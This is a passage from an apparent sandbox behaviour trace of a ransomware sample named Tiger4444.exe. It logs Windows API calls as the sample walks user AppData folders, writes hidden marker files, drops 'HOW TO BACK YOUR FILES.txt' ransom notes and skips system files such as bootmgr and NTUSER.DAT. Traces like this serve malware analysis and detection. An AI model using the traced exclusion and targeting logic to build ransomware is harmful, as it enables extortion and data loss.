Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3" [0053.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0053.411] WriteFile (in: hFile=0x2b8, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0053.413] FlushFileBuffers (hFile=0x2b8) returned 1 [0053.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.210] CloseHandle (hObject=0x2b8) returned 1 [0054.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0054.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd4) returned 0xc5f6a8 [0054.234] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66628 | out: ListHead=0xc66808, ListEntry=0xc66628) returned 0x0 [0054.234] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0054.234] lstrcmpiW (lpString1="TaskBar", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.234] lstrcmpiW (lpString1="TaskBar", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="Tiger4444.exe") returned -1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2=".") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="..") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="windows") returned -1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="bootmgr") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="pagefile.sys") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="boot") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="ids.txt") returned 1 [0054.236] lstrcmpiW (lpString1="TaskBar", lpString2="NTUSER.DAT") returned 1 [0054.236] lstrcpyW (in: lpString1=0x30aeb52, lpString2="TaskBar" | out: lpString1="TaskBar") returned="TaskBar" [0054.236] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", dwFileAttributes=0x10) returned 1 [0054.249] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0054.249] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xba) returned 0xc73f50 [0054.249] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66308 [0054.249] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0054.249] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0054.249] lstrcpyW (in: lpString1=0x30aeb52, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.263] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.263] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.264] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.265] CloseHandle (hObject=0x2b8) returned 1 [0054.265] CloseHandle (hObject=0x2c4) returned 1 [0054.265] GetCurrentThreadId () returned 0xfa8 [0054.265] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0054.265] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0054.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0054.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0054.265] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0054.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0054.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3" [0054.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.266] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.273] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.275] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.275] CloseHandle (hObject=0x2c4) returned 1 [0054.276] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 92 [0054.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.276] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x855c6a67, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0054.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.276] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.276] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x855c6a67, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.276] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.276] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.276] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.276] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.276] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x855c6a67, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x855c6a67, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x855ecd0c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.276] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.276] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.276] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.276] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.276] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0054.276] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0054.277] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0054.277] lstrcpyW (in: lpString1=0x30aeb62, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0054.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini", dwFileAttributes=0x2) returned 1 [0054.277] lstrlenW (lpString="desktop.ini") returned 11 [0054.277] lstrlenW (lpString="Tiger4444") returned 9 [0054.277] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0054.277] lstrlenW (lpString=".dll") returned 4 [0054.277] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0054.277] lstrlenW (lpString=".lnk") returned 4 [0054.277] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0054.277] lstrlenW (lpString=".ini") returned 4 [0054.277] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0054.277] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x61db3fcd, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="Tiger4444.exe") returned -1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2=".") returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="..") returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="windows") returned -1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="bootmgr") returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="pagefile.sys") returned -1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="boot") returned 1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="ids.txt") returned -1 [0054.277] lstrcmpiW (lpString1="File Explorer.lnk", lpString2="NTUSER.DAT") returned -1 [0054.277] lstrcpyW (in: lpString1=0x30aeb62, lpString2="File Explorer.lnk" | out: lpString1="File Explorer.lnk") returned="File Explorer.lnk" [0054.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk", dwFileAttributes=0x0) returned 1 [0054.278] lstrlenW (lpString="File Explorer.lnk") returned 17 [0054.278] lstrlenW (lpString="Tiger4444") returned 9 [0054.278] lstrcmpiW (lpString1="lorer.lnk", lpString2="Tiger4444") returned -1 [0054.278] lstrlenW (lpString=".dll") returned 4 [0054.278] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0054.278] lstrlenW (lpString=".lnk") returned 4 [0054.278] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0054.278] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8e963a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7972e3b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x61db3fcd, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0054.278] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0054.278] lstrcpyW (in: lpString1=0x30aeb62, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.281] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.281] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.282] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.282] CloseHandle (hObject=0x2b8) returned 1 [0054.282] CloseHandle (hObject=0x2c4) returned 1 [0054.282] GetCurrentThreadId () returned 0xfa8 [0054.282] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0054.282] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" [0054.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0054.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0054.282] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod" [0054.282] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\" [0054.282] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3" [0054.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.288] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.290] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.292] CloseHandle (hObject=0x2c4) returned 1 [0054.292] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod") returned 53 [0054.292] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.292] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x855ecd0c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0054.292] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.292] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.293] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.293] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.293] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x855ecd0c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.293] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.293] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.293] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.293] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.293] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.293] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x855ecd0c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x855ecd0c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x856132fc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.293] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.293] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.293] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chs", cAlternateFileName="")) returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="Tiger4444.exe") returned -1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2=".") returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="..") returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="windows") returned -1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="bootmgr") returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="pagefile.sys") returned -1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="boot") returned 1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="ids.txt") returned -1 [0054.293] lstrcmpiW (lpString1="Chs", lpString2="NTUSER.DAT") returned -1 [0054.293] lstrcpyW (in: lpString1=0x30aeb14, lpString2="Chs" | out: lpString1="Chs") returned="Chs" [0054.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0054.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x74) returned 0xc83f90 [0054.293] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66608 [0054.293] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chs", cAlternateFileName="")) returned 0 [0054.293] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0054.293] lstrcpyW (in: lpString1=0x30aeb14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.295] CreateFileMappingW 